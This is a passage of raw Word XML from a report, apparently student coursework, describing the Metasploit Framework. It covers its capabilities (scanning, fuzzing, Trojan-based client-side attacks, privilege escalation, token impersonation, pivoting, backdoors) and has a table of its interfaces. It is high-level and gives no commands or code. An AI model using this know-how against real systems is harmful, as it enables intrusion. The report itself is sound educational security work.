          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Network discovery</w:t>
      </w:r>
      <w:r w:rsidR="00CE7369" w:rsidRPr="00442CC2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63B6557C" w14:textId="037F5131" w:rsidR="00442CC2" w:rsidRDefault="00442CC2" w:rsidP="00442CC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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Pen test re</w:t>
      </w:r>
      <w:r w:rsidR="00927D65">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>porting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C2591B" w14:textId="718775FA" w:rsidR="00927D65" w:rsidRDefault="00927D65" w:rsidP="00442CC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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Web interface (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026D7BC6" w14:textId="03925C9C" w:rsidR="00523A53" w:rsidRDefault="00523A53" w:rsidP="00442CC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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Automated Brute forcing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51EAC440" w14:textId="231C0C01" w:rsidR="00523A53" w:rsidRDefault="001A2D9E" w:rsidP="00442CC2">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:num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Integrations via remote API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="795BCF61" w14:textId="77777777" w:rsidR="005B3FFF" w:rsidRDefault="005B3FFF" w:rsidP="005B3FFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B27FBAC" w14:textId="77777777" w:rsidR="005B3FFF" w:rsidRPr="005B3FFF" w:rsidRDefault="005B3FFF" w:rsidP="005B3FFF">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7544DC40" w14:textId="292B710B" w:rsidR="004331D6" w:rsidRDefault="004331D6" w:rsidP="00467048">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Functionalities and Capabilities of Metasploit</w:t>
      </w:r>
      <w:r w:rsidR="003F229B">
        <w:t xml:space="preserve"> Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19FDB394" w14:textId="0E15A54E" w:rsidR="006053DB" w:rsidRDefault="006053DB" w:rsidP="006053DB"/>
    <w:p w14:paraId="1EEC968A" w14:textId="200F4A8B" w:rsidR="00F801B9" w:rsidRDefault="00540BFA" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Metasp</w:t>
      </w:r>
      <w:r w:rsidR="00D670B7">
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t>oit has</w:t>
      </w:r>
      <w:r w:rsidR="004D6E2C">
        <w:t xml:space="preserve"> so many facets to it that it would take a very len</w:t>
      </w:r>
      <w:r w:rsidR="00EA38FD">
        <w:t>g</w:t>
      </w:r>
      <w:r w:rsidR="004D6E2C">
        <w:t xml:space="preserve">thy report to describe every </w:t>
      </w:r>
      <w:r w:rsidR="005C4ADA">
        <w:t xml:space="preserve">capability of this software. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t>At a very high level the</w:t>
      </w:r>
      <w:r w:rsidR="007D57E0">
        <w:t xml:space="preserve"> Metasploit Framework</w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007D57E0">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="007D57E0">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00605B5D">
        <w:t>can be used as a</w:t>
      </w:r>
      <w:r w:rsidR="00A5608C">
        <w:t xml:space="preserve">n information gathering tool </w:t>
      </w:r>
      <w:r w:rsidR="00AD4D03">
        <w:t xml:space="preserve">(including a tool that can detect passwords being sent </w:t>
      </w:r>
      <w:r w:rsidR="005806BF">
        <w:t>via unencrypted protocols)</w:t>
      </w:r>
      <w:r w:rsidR="008476B6">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00AC4134">
        <w:t xml:space="preserve">It can </w:t>
      </w:r>
      <w:r w:rsidR="00A312F0">
        <w:t xml:space="preserve">also </w:t>
      </w:r>
      <w:r w:rsidR="00AC4134">
        <w:t xml:space="preserve">be used as a </w:t>
      </w:r>
      <w:r w:rsidR="00A5608C">
        <w:t>vulnerability scanner</w:t>
      </w:r>
      <w:r w:rsidR="0005565E">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00AC4134">
        <w:t>and</w:t>
      </w:r>
      <w:r w:rsidR="0005565E">
        <w:t xml:space="preserve"> for Enumeration</w:t>
      </w:r>
      <w:r w:rsidR="00A5608C">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00381365">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004A119F">
        <w:t>Moreover,</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> it </w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t xml:space="preserve">allows </w:t>
      </w:r>
      <w:r w:rsidR="009A2A60">
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t xml:space="preserve"> use</w:t>
      </w:r>
      <w:r w:rsidR="009A2A60">
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="008708F3">
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidR="007A009E">
        <w:t>create a</w:t>
      </w:r>
      <w:r w:rsidR="009A2A60">
        <w:t>nd</w:t>
      </w:r>
      <w:r w:rsidR="007A009E">
        <w:t xml:space="preserve"> deploy exploits</w:t>
      </w:r>
      <w:r w:rsidR="00F946E9">
        <w:t xml:space="preserve"> for a variety of systems</w:t>
      </w:r>
      <w:r w:rsidR="00381365">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00381365">
        <w:t>has the ability to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00381365">
        <w:t xml:space="preserve"> provide Command and Control (C2) </w:t>
      </w:r>
      <w:r w:rsidR="00F801B9">
        <w:t>capabilities</w:t>
      </w:r>
      <w:r w:rsidR="00DB3A4B">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F946E9">
        <w:t xml:space="preserve">  It truly is a</w:t>
      </w:r>
      <w:r w:rsidR="009842CC">
        <w:t xml:space="preserve"> versatile</w:t>
      </w:r>
      <w:r w:rsidR="00F946E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="002C60D2">
        <w:t>tool that that could be very useful at every stage of the Cyber Kill chain</w:t>
      </w:r>
      <w:r w:rsidR="00471010">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-1396735029"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00471010">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00471010">
            <w:instrText xml:space="preserve"> CITATION LocBC \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00471010">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[5]</w:t>
          </w:r>
          <w:r w:rsidR="00471010">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="002C60D2">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00F946E9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B52D1B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35120EC2" w14:textId="3007FC4D" w:rsidR="00D21679" w:rsidRDefault="00BD2377" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The MSF can also be used for Fuzz testing, whereby </w:t>
      </w:r>
      <w:r w:rsidR="00C84F7B">
        <w:t xml:space="preserve">unexpected values are sent to a programme.  This is a test </w:t>
      </w:r>
      <w:r w:rsidR="00A93111">
        <w:t>to find out how the programme deals with error handling</w:t>
      </w:r>
      <w:r w:rsidR="00CE3A28">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00A93111">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00CE3A28">
        <w:t xml:space="preserve"> S</w:t>
      </w:r>
      <w:r w:rsidR="00661CB5">
        <w:t>o</w:t>
      </w:r>
      <w:r w:rsidR="00A93111">
        <w:t xml:space="preserve">metimes the programme may provide </w:t>
      </w:r>
      <w:r w:rsidR="001017DC">
        <w:t>details to the attacker unintentionally</w:t>
      </w:r>
      <w:r w:rsidR="00661CB5">
        <w:t xml:space="preserve"> or crash</w:t>
      </w:r>
      <w:r w:rsidR="001017DC">
        <w:t xml:space="preserve"> due to improper error handing.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EDE5B" w14:textId="2C4C9B41" w:rsidR="0084605C" w:rsidRDefault="00737639" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="00C35044">
        <w:t xml:space="preserve"> can also be used for </w:t>
      </w:r>
      <w:r w:rsidR="00010F60">
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="0025567A">
        <w:t>lient-side</w:t>
      </w:r>
      <w:r w:rsidR="00C35044">
        <w:t xml:space="preserve"> attacks, these involve user interaction such as clicking on</w:t>
      </w:r>
      <w:r w:rsidR="00367241">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C35044">
        <w:t xml:space="preserve">a link in an email to download a programme.  </w:t>
      </w:r>
      <w:r>
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="007C694B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E10B9F">
        <w:t>can create</w:t>
      </w:r>
      <w:r w:rsidR="007C694B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005C490F">
        <w:t>Trojans to deliver this type of payload</w:t>
      </w:r>
      <w:r w:rsidR="00004173">
        <w:t xml:space="preserve"> by</w:t>
      </w:r>
      <w:r w:rsidR="005C490F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00004173">
        <w:t xml:space="preserve">embedding it within another innocuous </w:t>
      </w:r>
      <w:r w:rsidR="00BB7698">
        <w:t>programme such as a game</w:t>
      </w:r>
      <w:r w:rsidR="00074A9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:id w:val="-352728142"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidR="00074A9D">
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00074A9D">
            <w:instrText xml:space="preserve"> CITATION OffBC \l 2057 </w:instrText>
          </w:r>
          <w:r w:rsidR="00074A9D">
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:r w:rsidR="00885C1C" w:rsidRPr="00885C1C">
            <w:rPr>
              <w:noProof/>
            </w:rPr>
            <w:t>[4]</w:t>
          </w:r>
          <w:r w:rsidR="00074A9D">
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="00074A9D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00370410" w14:textId="7CD641F4" w:rsidR="008745AB" w:rsidRDefault="00C82572" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Once the initial attack has been carried out </w:t>
      </w:r>
      <w:r w:rsidR="003253FA">
        <w:t>successful</w:t>
      </w:r>
      <w:r w:rsidR="009A58F6">
        <w:t>ly</w:t>
      </w:r>
      <w:r w:rsidR="003253FA">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">there are </w:t>
      </w:r>
      <w:r w:rsidR="003253FA">
        <w:t xml:space="preserve">post exploit </w:t>
      </w:r>
      <w:r w:rsidR="0025567A">
        <w:t>techniques that can be used</w:t>
      </w:r>
      <w:r w:rsidR="003D77B8">
        <w:t xml:space="preserve">.  </w:t>
      </w:r>
      <w:r w:rsidR="0055513B">
        <w:t xml:space="preserve">These techniques </w:t>
      </w:r>
      <w:r w:rsidR="008745AB">
        <w:t>include:</w:t>
      </w:r>
      <w:r w:rsidR="006549C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008745AB">
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039536F1" w14:textId="7AF6F484" w:rsidR="00576826" w:rsidRPr="00576826" w:rsidRDefault="00576826" w:rsidP="00576826">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidR="00010F60" w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>aintain</w:t>
      </w:r>
      <w:r w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>ing</w:t>
      </w:r>
      <w:r w:rsidR="00010F60" w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> a presence on the network, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F50A024" w14:textId="3EC3401F" w:rsidR="00576826" w:rsidRPr="00576826" w:rsidRDefault="00576826" w:rsidP="00576826">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidR="00010F60" w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rivilege escalation</w:t>
      </w:r>
      <w:r w:rsidR="00114D6C" w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07183995" w14:textId="05D78A97" w:rsidR="00576826" w:rsidRPr="006549C6" w:rsidRDefault="00576826" w:rsidP="00576826">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="11"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00114D6C" w:rsidRPr="00576826">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">mpersonating </w:t>
      </w:r>
      <w:r w:rsidR="00DE1C1B" w:rsidRPr="006549C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">valid tokens </w:t>
      </w:r>
      <w:r w:rsidR="006549C6" w:rsidRPr="006549C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(it is then possible to impersonate a member of staff, without requiring their credentials).  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA28B7A" w14:textId="77777777" w:rsidR="00576826" w:rsidRDefault="00576826" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C896A53" w14:textId="529BA631" w:rsidR="0084605C" w:rsidRDefault="00976636" w:rsidP="001C68CE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>MSF</w:t>
      </w:r>
      <w:r w:rsidR="007321F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00695836">
        <w:t xml:space="preserve">can also achieve the goal of pivoting on the network, so that </w:t>
      </w:r>
      <w:r w:rsidR="006B6E77">
        <w:t xml:space="preserve">the hacker can then access </w:t>
      </w:r>
      <w:r w:rsidR="00BC445B">
        <w:t>further devices on the network from the PC that was initially compromised.</w:t>
      </w:r>
      <w:r w:rsidR="00010F60">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC73CA">
        <w:t xml:space="preserve">The MSF can also be used to maintain access </w:t>
      </w:r>
      <w:r w:rsidR="00326431">
        <w:t xml:space="preserve">by setting up backdoors. </w:t>
      </w:r>
      <w:r w:rsidR="00FF1EB9">
        <w:t xml:space="preserve"> These are installed onto the network to allow the attacker access if the main </w:t>
      </w:r>
      <w:r w:rsidR="00F15015">
        <w:t xml:space="preserve">access method were to be discovered and resolved </w:t>
      </w:r>
      <w:r w:rsidR="002257F1">
        <w:t>at the target location.</w:t>
      </w:r>
      <w:r w:rsidR="00326431">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5537AB" w14:textId="77777777" w:rsidR="005B3FFF" w:rsidRDefault="005B3FFF" w:rsidP="006053DB"/>
    <w:p w14:paraId="0E60A658" w14:textId="77777777" w:rsidR="002257F1" w:rsidRDefault="002257F1" w:rsidP="006053DB"/>
    <w:p w14:paraId="61AE32C1" w14:textId="77777777" w:rsidR="00E10B9F" w:rsidRDefault="00E10B9F" w:rsidP="006053DB"/>
    <w:p w14:paraId="4E770EB0" w14:textId="77777777" w:rsidR="002257F1" w:rsidRDefault="002257F1" w:rsidP="006053DB"/>
    <w:p w14:paraId="1BB2538C" w14:textId="308A763E" w:rsidR="000B4EC6" w:rsidRPr="000B4EC6" w:rsidRDefault="00F801B9" w:rsidP="000B4EC6">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>MSF Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA7FED2" w14:textId="40E672B4" w:rsidR="002C0780" w:rsidRDefault="002C0780" w:rsidP="00AF325C">
      <w:r>
        <w:t>The</w:t>
      </w:r>
      <w:r w:rsidR="002507DC">
        <w:t xml:space="preserve">re are </w:t>
      </w:r>
      <w:r w:rsidR="00E10B9F">
        <w:t>several</w:t>
      </w:r>
      <w:r w:rsidR="002507DC">
        <w:t xml:space="preserve"> interfaces that can be used to interact with the</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MSF</w:t>
      </w:r>
      <w:r w:rsidR="00440CA0">
        <w:t xml:space="preserve">, these </w:t>
      </w:r>
      <w:r w:rsidR="00E10B9F">
        <w:t>include: -</w:t>
      </w:r>
      <w:r w:rsidR="00440CA0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2CC004" w14:textId="470045E3" w:rsidR="00E4496C" w:rsidRDefault="00E4496C" w:rsidP="00E4496C">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:keepNext/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc150084812"/>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00A630D1">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>1</w:t>
        </w:r>
      </w:fldSimple>
      <w:r w:rsidR="004A13CB">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000A0B7F">
        <w:t>MSF Interfaces [3] [4]</w:t>
      </w:r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AF325C" w14:paraId="06968F0F" w14:textId="77777777" w:rsidTr="00BD124C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="426F75B0" w14:textId="36521DEF" w:rsidR="00AF325C" w:rsidRPr="00BD124C" w:rsidRDefault="00AF325C" w:rsidP="006053DB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD124C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFD966" w:themeFill="accent4" w:themeFillTint="99"/>
          </w:tcPr>
          <w:p w14:paraId="4902AC3D" w14:textId="4055370D" w:rsidR="00AF325C" w:rsidRPr="00BD124C" w:rsidRDefault="00AF325C" w:rsidP="006053DB">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BD124C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF325C" w14:paraId="3331A694" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="58FADF54" w14:textId="71AF688D" w:rsidR="00AF325C" w:rsidRDefault="00E10B9F" w:rsidP="006053DB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00AF325C">
              <w:t>fsconsole</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B569227" w14:textId="7DC9DB33" w:rsidR="00AF325C" w:rsidRDefault="006C424D" w:rsidP="006053DB">
            <w:r>
              <w:t xml:space="preserve">This provides access to </w:t>
            </w:r>
            <w:r w:rsidR="00A00EB2">
              <w:t>most of</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> the </w:t>
            </w:r>
            <w:r w:rsidR="00091451">
              <w:t xml:space="preserve">options available in the MSF.  This is the </w:t>
            </w:r>
            <w:r w:rsidR="00A00EB2">
              <w:t>most widely used interface</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF325C" w14:paraId="0F6BDDA7" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12D04F64" w14:textId="07796D15" w:rsidR="00AF325C" w:rsidRDefault="00E10B9F" w:rsidP="006053DB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>M</w:t>
            </w:r>
            <w:r w:rsidR="00AF325C">
              <w:t>fscli</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C8257B7" w14:textId="73E27272" w:rsidR="00AF325C" w:rsidRDefault="00081C23" w:rsidP="006053DB">
            <w:r>
              <w:t xml:space="preserve">Command line interface for the MSF and is useful in </w:t>
            </w:r>
            <w:r w:rsidR="000E09B9">
              <w:t>scripting exploits</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AF325C" w14:paraId="584B5844" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3822FECC" w14:textId="6B19175D" w:rsidR="00AF325C" w:rsidRDefault="00AF325C" w:rsidP="006053DB">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>msfvenom</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3195BB9E" w14:textId="55ED4291" w:rsidR="00AF325C" w:rsidRDefault="00702B3B" w:rsidP="006053DB">
            <w:r>
              <w:t xml:space="preserve">Payload Generator: Can be used to create </w:t>
            </w:r>
            <w:r w:rsidR="008F359A">
              <w:t>payloads that can be sent to the target machine.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A653F9" w14:paraId="0E0A6CE2" w14:textId="77777777" w:rsidTr="00AF325C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1838" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12CA81A6" w14:textId="147ABA07" w:rsidR="00A653F9" w:rsidRDefault="0073637A" w:rsidP="006053DB">
            <w:r>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidR="00A653F9">
              <w:t>fs</w:t>
            </w:r>
            <w:r w:rsidR="003D676F">
              <w:t>-</w:t>
            </w:r>
            <w:r>
              <w:t>hmac_sha1_crack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7178" w:type="dxa"/>
          </w:tcPr>
